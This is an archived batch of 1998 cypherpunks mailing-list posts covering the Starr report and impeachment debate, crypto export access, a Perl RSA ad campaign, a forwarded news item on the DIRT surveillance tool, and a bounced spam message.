Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  WINDOWS?!?  Hahahahahehehehehohohoho...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfntKY9Co1n+aLhhAQEdigQAoPF5AAB7oT0kvxxql0db2odiLihizWRY
YtVbL8jn5vRDTcj80epu5/6hwJkA95RWNo3yIOCFFvkdzPlsmFeYRaMFvKYdPSwH
G+a0/xPjAOhA/NiSAATXR9rEr+eotIWsInN55m0G5b8LCBXNIWxP1W2+P/+4gWcF
3hL3Nb595RM=
=bzN7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eudora Export Control Team <export-control@qualcomm.com>
Date: Sat, 12 Sep 1998 01:30:22 +0800
To: cypherpunks@Algebra.COM
Subject: Access to Eudora Export Controlled Archives
Message-ID: <199809120616.XAA11486@ithilien.eudora.com>
MIME-Version: 1.0
Content-Type: text/plain



You may access the Eudora/PGP archives at the following address.

	<http://www.eudora.com/export/download/>

Your username and password are given below.

        Username: guest51285
        Password: 4ChmcTZH

ABOUT YOUR PASSWORD

Most browsers allow you to paste passwords into the authentication
box.  If you have a problem with a username and password that we
supplied, please try copying the password from this message, reload 
the PGP download area page in your browser and paste the password into 
the password field of the authentication dialog box that pops up in 
front of the page.

Additionally, these passwords expire. If you are denied access 
to the PGP download area at a later date, please get a new password.

Be sure to keep this username and password to yourself.  If someone 
you know wants access to the archives, please send them to 

	<http://www.eudora.com/export/>


Thanks for your support!

The Eudora Export Control Team




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Fri, 11 Sep 1998 19:15:21 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Newspaper Ad Project
In-Reply-To: <199808261817.NAA04960@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980912000838.6262H-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




    I think you'll find that you can buy multicolumn display ads
    cheaper than classifieds --where you can also get multi-column.
    display ad is almost always cheaper for one shot; and, you have
    a choice of position --and therefore cost

On Wed, 26 Aug 1998, Jim Choate wrote:

>Hi,
>
>I was wondering if we might go ahead and set a date for publishing across
>the country the 3-line Perl RSA. I would like to suggest something like
>Halloween, at least a month a way.
>
>The cpunks here in Austin believe we can handle Austin, Houston, Dallas, Ft.
>Worth, San Antonio, and El Paso.
>
>One issue is that the columns in the paper are pretty limited, so it won't
>be 3 lines in reality. Anybody know the standard paper column width? Who
>wants to reformat the Perl?
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Fri, 11 Sep 1998 21:58:29 +0800
To: cypherpunks@Algebra.COM
Subject: CDA? What CDA?
Message-ID: <19980912030005.7730.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



CNN. Pathfinder. Everybody and his dog with a website. The White
House. Posting "indecent material" on the web.

I mean, I'm impressed.


(A bit more seriously though: could this fact possibly help - in the
future - if the US gvt was again seeking to "curb indecency onm the
Net"?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 12 Sep 1998 10:03:59 +0800
To: Jim Gillogly <jimg@mentat.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809112128.OAA14441@zendia.mentat.com>
Message-ID: <Pine.GSO.3.95.980912080309.12595B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 11 Sep 1998, Jim Gillogly wrote:
> 
> If they <do> decide this is now a requirement for high office, I'd like
> to see all the Congresscritters who've had sex out of wedlock and
> concealed it take one step forward.  Shall we make hypocrisy in high
> office impeachable also?

A better question is: If Clinton is guilty of perjury and other felonies,
should he be impeached? 

If you don't think about lying about sex and related issues under oath
should be a crime, well, then change the law. But right now any form of
lying under oath is perjury, whether you like it or not. 

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Sep 1998 07:19:43 +0800
To: Bill Stewart <cypherpunks@Algebra.COM
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <3.0.6.32.19980910205225.0096d7d0@alaska.net>
Message-ID: <199809121221.IAA15102@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:38 PM 9/11/98 -0700, Bill Stewart wrote:

>Those New Jersey prices, while lower than New York, are still
>articifially high, since they're "full-service".  The People's 
>Republic of New Jersey *knows* that regular untrained citizens
>can't be trusted to pump their own gasoline reliably -
>otherwise you'd be having frequent explosions at gasoline
>stations like you do in the rest of the country.

No.  The legislature knows that the citizens of the Garden State are otherwise unemployable so they have established a protected job category of gas jockey to keep them off the streets.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Sep 1998 07:35:48 +0800
To: Michael Motyka <cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809112128.OAA14441@zendia.mentat.com>
Message-ID: <199809121230.IAA15602@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:35 PM 9/11/98 -0700, Michael Motyka wrote:

>It's worse than not impressive: it's PATHETIC. I thought we'd have 425
>pages of real output relating to the last 6 years of "work" and 25 pages
>of Monica. I'd rather finance $600 toilet seats and $1200 gold-plated
>hammers with my tax money than Starr's brand of open political warfare.
>It's simple, partisan, Rottweiler politics. The kind of stuff that makes
>you leave your shoes outside the door when you get home at night.

Save that the impeachment of a president is not the main job of the OIC.  He is supposed to 1) Investigate, 2) Indict, and 3) Report to the AG and the 3-judge panel that appointed him.  If he stumbles across evidence of impeachable offenses he can send a report to the House but that is a SIDE job.

Starr took 8 months to go from zero to "evidence of impeachable offenses" in  Fornigate.  The rest of the investigation continues.  He has 5 different areas of responsibility.  He submitted Monica to the House because he had rock solid proof that Clinton is a lying sack of shit and a multiple felon.  Something we knew years ago but couldn't prove.  

With KKKlinton, you don't shoot unless you have an elephant gun.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Sat, 12 Sep 1998 10:49:06 +0800
To: declan@well.com
Subject: Re: Clinton's fake apologies
Message-ID: <199809121549.IAA28683@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan wrote:
> On Fri, 11 Sep 1998, Jim Gillogly wrote:
> > 
> > If they <do> decide this is now a requirement for high office, I'd like
> > to see all the Congresscritters who've had sex out of wedlock and
> > concealed it take one step forward.  Shall we make hypocrisy in high
> > office impeachable also?
> 
> A better question is: If Clinton is guilty of perjury and other felonies,
> should he be impeached?

IANAL (feel free to weigh in here, Unicorn), but I heard on one show or
another that lying under oath is perjury only if it's material to the
suit.  Since the Jones case was dismissed, it was argued that even if he
lied then, it wasn't material and thus wasn't perjury -- they claimed that
nobody had every been convicted of perjury for lying in a case that was
dismissed.  Of course he's saying he didn't even lie: like Kinky Friedman
and the Texas Jewboys, as espoused in their legal treatise "Waitret, please
waitret, come sit on my face", he believes that "Eatin' ain't cheatin'."
YMMV.

In any case, despite these legalisms, I'm not convinced that perjury in
any case should be considered treason or high crimes and misdemeanors.
The Founding Fathers could have been more specific about what was
impeachable, and they chose not to be, leaving it intentionally ambiguous.

Despite those arguments, this stuff really isn't about perjury: it's about
the Republicans' case of nixon envy... Clinton's peccadillos are a far cry
from Watergate (or Teapot Dome or Iran-Contra), but it's the best chance
they've had since the Crook was dumped.

> If you don't think about lying about sex and related issues under oath
> should be a crime, well, then change the law. But right now any form of
> lying under oath is perjury, whether you like it or not. 

If he did commit perjury, would that be an impeachable offense?  I claim
it's up to the House to interpret just what constitutes high crimes and
misdemeanors, since it isn't spelled out in the Constitution.

Disclaimer -- I'm not a Democrat, and I'm annoyed with Clinton's behavior
on crypto issues.  If I appear to be defending him, it's inadvertant -- I
just feel he should be attacked on material points rather than whatever
sleazy stuff Starr has found under his rocks.

	Jim 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 11:18:21 +0800
To: remailer@replay.com
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.LNX.3.96.980911124049.451C-100000@jb3.fastrans.net>
Message-ID: <3.0.5.32.19980912091319.007cca60@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



:: 
Anon-To: Tim May <tcmay@got.net>, Jim Burnes <jvb@ssds.com>, Declan
McCullagh <declan@well.com>

At 12:12 PM 9/11/98 -0700, Tim May wrote:
>details about Clinton's cigar being inserted into Monica's vagina, about
>how Clinton talked with Congressional leaders while Monica was giving him a
>blowjob, and how Clinton suborned perjury and tampered with evidence....

There's a footnote that mentions oral-anal sex.  Perhaps in DC this
is a crime?








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 08:50:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Governemnts should give up regulating Internet [CNN] (fwd)
Message-ID: <199809121414.JAA15432@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Sat Sep 12 09:13:45 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199809121413.JAA15418@einstein.ssz.com>
Subject: Governemnts should give up regulating Internet [CNN]
To: users@ssz.com (SSZ User Mail List)
Date: Sat, 12 Sep 1998 09:13:39 -0500 (CDT)
Cc: friends@ssz.com (Ravage's Friends)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2001      


Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9809/11/govnet.idg/

>                GOVERNMENTS CAN'T HANDLE INTERNET, SAYS MAGAZINER

>    September 11, 1998
>    Web posted at 1:20 PM EDT
>    
>    by Jana Sanchez-Klein
>    
>    LONDON (IDG) -- European countries should cooperate with the U.S. to
>    create an Internet that is regulated by the industry rather than by
>    governments, said Ira Magaziner, senior adviser to U.S. President Bill
>    Clinton for Internet policy development, at The Wall Street Journal
>    Europe's Fifth Annual CEO Summit on Converging Technologies.
>    
>    "We are trying to come to an agreement with the European Union where
>    they recognize our approach," said Magaziner, a speaker at the
>    conference here today.
>    
>    He outlined the importance of the Internet to the U.S. and world
>    economies and said that it was not up to governments to attempt to
>    control Internet use and commerce. Magaziner attributed one-third of
>    all economic growth in the U.S. to the building of the Internet. But,
>    he warned, "if goods are overtaxed or overregulated, it's hard to do
>    business. The private sector should lead."
>    
>    Governments are ill-equipped to handle the Internet, because it
>    changes too rapidly, it's too decentralized and too international,
>    suggested Magaziner.
>    
>    "The digital age moves too quickly for government action," he said.

[text deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 11:18:35 +0800
To: lcs Mixmaster Remailer <cypherpunks@Algebra.COM
Subject: Re: CDA? What CDA?
In-Reply-To: <19980912030005.7730.qmail@nym.alias.net>
Message-ID: <3.0.5.32.19980912091811.007c2750@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:00 AM 9/12/98 -0000, lcs Mixmaster Remailer wrote:
>CNN. Pathfinder. Everybody and his dog with a website. The White
>House. Posting "indecent material" on the web.
>
>I mean, I'm impressed.
>

Given the number of times that cigars are mentioned, its a regular
advertisement.  And I thought the gov't was fighting tobacco,
not finding novel uses for it.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 11:37:43 +0800
To: "William H. Geiger III" <mix@anon.lcs.mit.edu>
Subject: Re: CDA? What CDA?
In-Reply-To: <19980912030005.7730.qmail@nym.alias.net>
Message-ID: <3.0.5.32.19980912092058.007c4ae0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:39 PM 9/11/98 -0500, William H. Geiger III wrote:
>It sure will be a nice thing to throw in thier face next time they bring
>CDA up. :)
>


It'll help remind those youngsters who never experienced Nixon
how much you can trust people in power... at least for the next
few days, until their memories fade again...














  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Sat, 12 Sep 1998 11:23:04 +0800
To: vznuri@netcom.com>
Subject: Re: If there's a trial will some of us be witnesses?
Message-ID: <2e7c5862e97aaec19ba22db438e362d3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri wrote:
> at one time, kevin mitnick was on this list, rumor has
> it. probably many of the world's premiere hackers have been at one time or
> another.

L. Detweiler and Phiber Optik were concurrently subscribed in early '93.
But you know that, don't you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 11:49:56 +0800
To: cypherpunks@toad.com
Subject: Altoids & email
Message-ID: <3.0.5.32.19980912094145.007c4ae0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




"o.(708) Ms. Lewinsky gave him an antique paperweight in the shape of the
White House.(709) She also showed him an email describing the effect of
chewing Altoid mints before performing oral sex. Ms. Lewinsky was chewing
Altoids at the time, but the President replied that he did not have enough
time for oral sex.(710) "


So she followed the circulating email neterotica.. too bad she didn't 
know about infosec...

"Some of Ms. Lewinsky's statements about the relationship were
contemporaneously memorialized. These include deleted email recovered from
her home computer and her Pentagon computer, email messages retained by two
of the recipients,"






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sat, 12 Sep 1998 12:08:13 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: IP: [Fwd: new threat to privacy]
Message-ID: <3.0.32.19980912094344.006ba0ec@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



ummm ... not to sound skeptical, but were did -this- thing come from?
looks like a crock to me.  here, guys: have at it, here's my email address.

ps: can you spell "agent provocateur" ---- (I'm not sure *I* can...)


At 11:43 AM 9/12/98 -0400, Robert Hettinga wrote:
>
>
>--- begin forwarded text
>
>
>Delivered-To: ignition-point@majordomo.pobox.com
>X-ROUTED: Sat, 12 Sep 1998 10:35:58 -0500
>X-TCP-IDENTITY: Bucsplace
>Date: Sat, 12 Sep 1998 10:30:29 -0400
>From: oldbat <bucsplace@cchat.com>
>MIME-Version: 1.0
>To: IP <ignition-point@majordomo.pobox.com>
>Subject: IP: [Fwd: new threat to privacy]
>Sender: owner-ignition-point@majordomo.pobox.com
>Precedence: list
>Reply-To: oldbat <bucsplace@cchat.com>
>
>
>
>From: "Bill Prince" <webprince@SPAMmindspring.com>
>Newsgroups: misc.survivalism
>Subject: new threat to privacy
>Date: Thu, 10 Sep 1998 16:14:54 -0400
>Organization: MindSpring Enterprises
>Message-ID: <6t9bu9$spm$1@camel15.mindspring.com>
>NNTP-Posting-Host: user-37kbbqr.dialup.mindspring.com
>X-Server-Date: 10 Sep 1998 20:14:01 GMT
>X-Newsreader: Microsoft Outlook Express 5.00.0518.4
>X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0518.4
>Path:
>news.dx.net!news.accessus.net!news2.rdr.net!news-out.internetmci.com!news.i
ntern
>etMCI.com!newsfeed.internetmci.com!4.1.16.34!cpk-news-hub1.bbnplanet.com!ne
ws.bb
>nplanet.com!firehose.mindspring.com!not-for-mail
>
>There is another powerful tool for surreptitiously intercepting
>data, but it is only available to law enforcement and the
>military. Called DIRT (Data Interception and Remote
>Transmission), it was released in June by Codex Data Systems.
>http://www.thecodex.com/dirt.html
>
>Investigators need only know your e-mail address to secretly
>install the program. Once they do, investigators can read your
>documents, view your images, download your files and intercept
>your encryption keys. DIRT was developed to assist law
>enforcement in pedophilia investigations, but future uses could
>include drug investigations, money laundering cases and
>information warfare.
>
>- -
>Bill Prince | Orlando, Florida |
>Linuxori te salutamus!
>Take out the SPAM to email me!
>- -
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 10:12:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809121536.KAA15651@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 12 Sep 1998 08:05:07 -0700 (PDT)
> From: Declan McCullagh <declan@well.com>
> Subject: Re: Clinton's fake apologies

> On Fri, 11 Sep 1998, Jim Gillogly wrote:
> > 
> > If they <do> decide this is now a requirement for high office, I'd like
> > to see all the Congresscritters who've had sex out of wedlock and
> > concealed it take one step forward.  Shall we make hypocrisy in high
> > office impeachable also?
> 
> A better question is: If Clinton is guilty of perjury and other felonies,
> should he be impeached? 
> 
> If you don't think about lying about sex and related issues under oath
> should be a crime, well, then change the law. But right now any form of
> lying under oath is perjury, whether you like it or not. 

As rare as it is, I agree with Declan here. If Clinton would lie under oath
about a non-crime (ie sex between consenting adults) what would he do if
faced with a real issue?

He should have said "Yeah, I had sex with her. What business is it of
yours?".


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 12 Sep 1998 12:53:22 +0800
To: Jim Gillogly <jimg@mentat.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809121549.IAA28683@zendia.mentat.com>
Message-ID: <Pine.GSO.3.95.980912105356.24790A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



1. it's tough to argue that clinton's apparent perjury in Jones was
immaterial

2. i know of no law saying perjury only a crime if it's "material"

3. perjury is certainly one of the "great offenses" that common law says
is impeachable.

4. besides, non-criminal activities can constitute impeachable offenses --
look at second and third articles of impeachment in Nixon's case

-Declan


On Sat, 12 Sep 1998, Jim Gillogly wrote:

> Declan wrote:
> > On Fri, 11 Sep 1998, Jim Gillogly wrote:
> > > 
> > > If they <do> decide this is now a requirement for high office, I'd like
> > > to see all the Congresscritters who've had sex out of wedlock and
> > > concealed it take one step forward.  Shall we make hypocrisy in high
> > > office impeachable also?
> > 
> > A better question is: If Clinton is guilty of perjury and other felonies,
> > should he be impeached?
> 
> IANAL (feel free to weigh in here, Unicorn), but I heard on one show or
> another that lying under oath is perjury only if it's material to the
> suit.  Since the Jones case was dismissed, it was argued that even if he
> lied then, it wasn't material and thus wasn't perjury -- they claimed that
> nobody had every been convicted of perjury for lying in a case that was
> dismissed.  Of course he's saying he didn't even lie: like Kinky Friedman
> and the Texas Jewboys, as espoused in their legal treatise "Waitret, please
> waitret, come sit on my face", he believes that "Eatin' ain't cheatin'."
> YMMV.
> 
> In any case, despite these legalisms, I'm not convinced that perjury in
> any case should be considered treason or high crimes and misdemeanors.
> The Founding Fathers could have been more specific about what was
> impeachable, and they chose not to be, leaving it intentionally ambiguous.
> 
> Despite those arguments, this stuff really isn't about perjury: it's about
> the Republicans' case of nixon envy... Clinton's peccadillos are a far cry
> from Watergate (or Teapot Dome or Iran-Contra), but it's the best chance
> they've had since the Crook was dumped.
> 
> > If you don't think about lying about sex and related issues under oath
> > should be a crime, well, then change the law. But right now any form of
> > lying under oath is perjury, whether you like it or not. 
> 
> If he did commit perjury, would that be an impeachable offense?  I claim
> it's up to the House to interpret just what constitutes high crimes and
> misdemeanors, since it isn't spelled out in the Constitution.
> 
> Disclaimer -- I'm not a Democrat, and I'm annoyed with Clinton's behavior
> on crypto issues.  If I appear to be defending him, it's inadvertant -- I
> just feel he should be attacked on material points rather than whatever
> sleazy stuff Starr has found under his rocks.
> 
> 	Jim 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 12 Sep 1998 12:57:04 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809121548.LAA14443@camel14.mindspring.com>
Message-ID: <Pine.GSO.3.95.980912105436.24790B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



John, some of the press were relying on House sources to get the material
up as quickly as possible. Also AP provided it to its members on a
password-protected web site. I was the first in Time's DC bureau to get
the report; I'm not going to reveal my source save to say it wasn't
Starr's office. 

-Declan


On Sat, 12 Sep 1998, John Young wrote:

> Declan, a few questions on the CDs of the Starr report: 
> 
> 1. Did the press get the CDs, say, embargoed, before the House 
> authorized release? 
> 
> 2. Who handled the CD distribution, the House or Starr or 3rd 
> party?
> 
> 3. Do you know anything about how the CDs were made, by 
> Starr's op or some other party, and when made?
> 
> 4. Will there be pre-releases of press-only CDs of the remaining 
> material, that is, is there a boxed-series prepared of the whole
> wad for lobbing week by weekly?
> 
> This is a query about fake news, lying, perjuring, you know, to
> the American People, whatever that junk-populace is cooked 
> up to be.
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 12 Sep 1998 11:02:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809121625.LAA15937@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 12 Sep 1998 08:49:56 -0700
> From: jimg@mentat.com (Jim Gillogly)
> Subject: Re: Clinton's fake apologies

> In any case, despite these legalisms, I'm not convinced that perjury in
> any case should be considered treason or high crimes and misdemeanors.
> The Founding Fathers could have been more specific about what was
> impeachable, and they chose not to be, leaving it intentionally ambiguous.

What part of:

High crimes and misdemeanors don't you understand?

Oh, and it isn't 'high misdemeanors'...

I figure it's the fact that 'principles' are involved that is confusing
everybody, no room to move like there is with relativism. Bottem line, he
held a public office, while in that office he should commit *NO* crime or
else he should loose that office. There was no abmiguity there in the minds
of the founding fathers and there shouldn't be in yours either. If this
confuses you then take it as an indication that you have a axiomatic
contradiction in your world view and need to rethink things in a serious
way.

As Jefferson said, if you hold a public office your public property.

Nail the son of a bitch to the wall, he did the crime let him do the time.

It's a pitty he doesn't have this sort of empathy for all those people he's
put in jail for consensual crimes during his tenure. The man has a base
double standard, let him pay for it.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Sep 1998 10:44:16 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [Fwd: new threat to privacy]
Message-ID: <v04011708b22047020d29@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-ROUTED: Sat, 12 Sep 1998 10:35:58 -0500
X-TCP-IDENTITY: Bucsplace
Date: Sat, 12 Sep 1998 10:30:29 -0400
From: oldbat <bucsplace@cchat.com>
MIME-Version: 1.0
To: IP <ignition-point@majordomo.pobox.com>
Subject: IP: [Fwd: new threat to privacy]
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: oldbat <bucsplace@cchat.com>



From: "Bill Prince" <webprince@SPAMmindspring.com>
Newsgroups: misc.survivalism
Subject: new threat to privacy
Date: Thu, 10 Sep 1998 16:14:54 -0400
Organization: MindSpring Enterprises
Message-ID: <6t9bu9$spm$1@camel15.mindspring.com>
NNTP-Posting-Host: user-37kbbqr.dialup.mindspring.com
X-Server-Date: 10 Sep 1998 20:14:01 GMT
X-Newsreader: Microsoft Outlook Express 5.00.0518.4
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0518.4
Path:
news.dx.net!news.accessus.net!news2.rdr.net!news-out.internetmci.com!news.intern
etMCI.com!newsfeed.internetmci.com!4.1.16.34!cpk-news-hub1.bbnplanet.com!news.bb
nplanet.com!firehose.mindspring.com!not-for-mail

There is another powerful tool for surreptitiously intercepting
data, but it is only available to law enforcement and the
military. Called DIRT (Data Interception and Remote
Transmission), it was released in June by Codex Data Systems.
http://www.thecodex.com/dirt.html

Investigators need only know your e-mail address to secretly
install the program. Once they do, investigators can read your
documents, view your images, download your files and intercept
your encryption keys. DIRT was developed to assist law
enforcement in pedophilia investigations, but future uses could
include drug investigations, money laundering cases and
information warfare.

- -
Bill Prince | Orlando, Florida |
Linuxori te salutamus!
Take out the SPAM to email me!
- -

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Sep 1998 10:46:58 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809112128.OAA14441@zendia.mentat.com>
Message-ID: <199809121548.LAA14443@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan, a few questions on the CDs of the Starr report: 

1. Did the press get the CDs, say, embargoed, before the House 
authorized release? 

2. Who handled the CD distribution, the House or Starr or 3rd 
party?

3. Do you know anything about how the CDs were made, by 
Starr's op or some other party, and when made?

4. Will there be pre-releases of press-only CDs of the remaining 
material, that is, is there a boxed-series prepared of the whole
wad for lobbing week by weekly?

This is a query about fake news, lying, perjuring, you know, to
the American People, whatever that junk-populace is cooked 
up to be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 12:34:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Is cypherpunks-unedited@toad.com broken?...
Message-ID: <199809121757.MAA16968@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From MAILER-DAEMON@telekom.de Sat Sep 12 12:50:46 1998
> Date: Fri, 11 Sep 1998 18:53:07 +0200
> From: Mail Delivery Subsystem <MAILER-DAEMON@telekom.de>
> Subject: Returned mail: Unable to deliver mail
> Message-Id: <9809111653.AB07969@fw9.telekom.de>
> To: owner-cypherpunks@einstein.ssz.com
> 
>    ----- Transcript of session follows -----
> 554 sendall: too many hops 19 (17 max): from <owner-cypherpunks@ssz.com>, to owner-cypherpunks@ssz.com
> 
>    ----- Unsent message follows -----
> Received: by fw9.telekom.de; (5.65v3.2/1.3/10May95) id AA07969; Fri, 11 Sep 1998 18:53:07 +0200
> Received: from einstein.ssz.com by fw9.telekom.de (smtpxd); id XA05182
> Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id LAA00752 for cypherpunks-outgoing; Thu, 10 Sep 1998 11:16:26 -0500
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> From: myemail@any.where.com
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Received: from somewhere by smtpxd
> Message-Id: <199809101721.DEK5253@myserver.com>
> Date: , 10  1998 17:21:34
> Subject: Exhibitions in Russia
> X-Uidl: 870483789,239
> To: cypherpunks-unedited@toad.com
> X-Mailing-List: cypherpunks@algebra.com
> X-List-Admin: ichudov@algebra.com
> X-Loop: cypherpunks@algebra.com
> Sender: owner-cypherpunks@ssz.com
> Precedence: bulk
> X-Mailing-List: cypherpunks@ssz.com
> X-List-Admin: list@ssz.com
> X-Loop: ssz.com
> X-Language: English, Russian, German
> 
> Dear cypherpunks-unedited@toad.com
> 
> Me prepared pages they will be useful all
> http://people.mosexpo.ru
> Exhibitions in Russia 
>  Food
> http://www.mosexpo.ru/gurman
> Telecom and Networks
> http://www.mosexpo.ru/telecom
> http://pc-expo.mosexpo.ru
> http://unix-expo.mosexpo.ru
